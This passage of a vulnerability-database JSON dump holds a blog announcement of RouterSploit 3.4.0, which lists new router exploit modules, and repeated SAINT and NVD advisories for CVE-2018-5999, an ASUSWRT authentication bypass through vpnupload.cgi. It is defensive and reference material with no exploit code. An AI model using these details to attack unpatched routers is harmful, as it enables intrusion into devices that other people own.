tests `tests/exploits/routers/cisco/test_firepower_management60_rce.py`\n * Adding tests `tests/exploits/routers/cisco/test_secure_acs_bypass.py`\n * Adding tests `tests/exploits/routers/dlink/test_dcs_930l_auth_rce.py`\n * Adding tests `tests/exploits/routers/technicolor/test_tg784_authbypass.py`\n * Adding tests `tests/exploits/routers/dlink/test_dsl_2730b_2780b_526b_dns_change.py`\n * Fixing `exploits/routers/ipfire/ipfire_proxy_rce.py` module\n * Fixing `exploits/routers/ipfire/ipfire_shellshock.py` module\n * Adding `exploits/routers/linksys/eseries_themoon_rce.py` module\n\n## Install RouterSploit 3.4.0:\n\nIf you have an older version checked out, all you now need to get the latest version is run: `git pull` in the installed directory and you should be updated to the latest version. In case you do not have it installed, the current version is RouterSploit 3.4.0. Check out the [GIT repository](<https://github.com/threat9/routersploit>), and run\n \n \n pip3 install -r requirements.txt\n ./rsf.py\n\nThe post [UPDATED VERSION: RouterSploit 3.4.0](<http://pentestit.com/updated-version-routersploit-3-4-0/>) appeared first on [PenTestIT](<http://pentestit.com>).", "cvss3": {}, "published": "2018-10-18T18:13:04", "type": "pentestit", "title": "UPDATED VERSION: RouterSploit 3.4.0", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2016-6433", "CVE-2017-3881", "CVE-2018-5999", "CVE-2018-6000"], "modified": "2018-10-18T18:13:04", "id": "PENTESTIT:30AF1FB3AAE47288E800B5587788AF45", "href": "http://pentestit.com/updated-version-routersploit-3-4-0/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2023-02-08T15:36:51", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<https://vulners.com/cve/CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:9EC44034675C3CB4D052F0A57AE94026", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-10T12:21:34", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<https://vulners.com/cve/CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:5069DD588A8DDA678A16F6B17DE4B1F1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:22", "description": "Added: 02/28/2018 \nCVE: [CVE-2018-5999](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5999>) \n\n\n### Background\n\n[ASUSWRT](<https://www.asus.com/ASUSWRT/>) is the firmware used in many ASUS devices. \n\n### Problem\n\nThe combination of two separate vulnerabilities in ASUSWRT allows remote attackers to execute arbitrary commands. The first vulnerability allows an unauthenticated user to make certain POST requests. The second allows NVRAM settings to be changed using a POST request to `**vpnupload.cgi**`. \n\n### Resolution\n\nUpgrade to ASUSWRT version 3.0.0.4.384_10007 or higher. \n\n### References\n\n<http://seclists.org/fulldisclosure/2018/Jan/78> \n\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-28T00:00:00", "type": "saint", "title": "ASUSWRT vpnupload.cgi authentication bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2018-02-28T00:00:00", "id": "SAINT:1FAFFE9723ECA2EE5DFB56A36466F828", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/asuswrt_vpnupload_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T14:28:47", "description": "An issue was discovered in AsusWRT before 3.0.0.4.384_10007. In the handle_request function in router/httpd/httpd.c, processing of POST requests continues even if authentication fails.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-01-22T20:29:00", "type": "cve", "title": "CVE-2018-5999", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-5999"], "modified": "2019-10-03T00:03:00", "cpe": [], "id": "CVE-2018-5999", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5999", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}]}
CVE-2018-6000
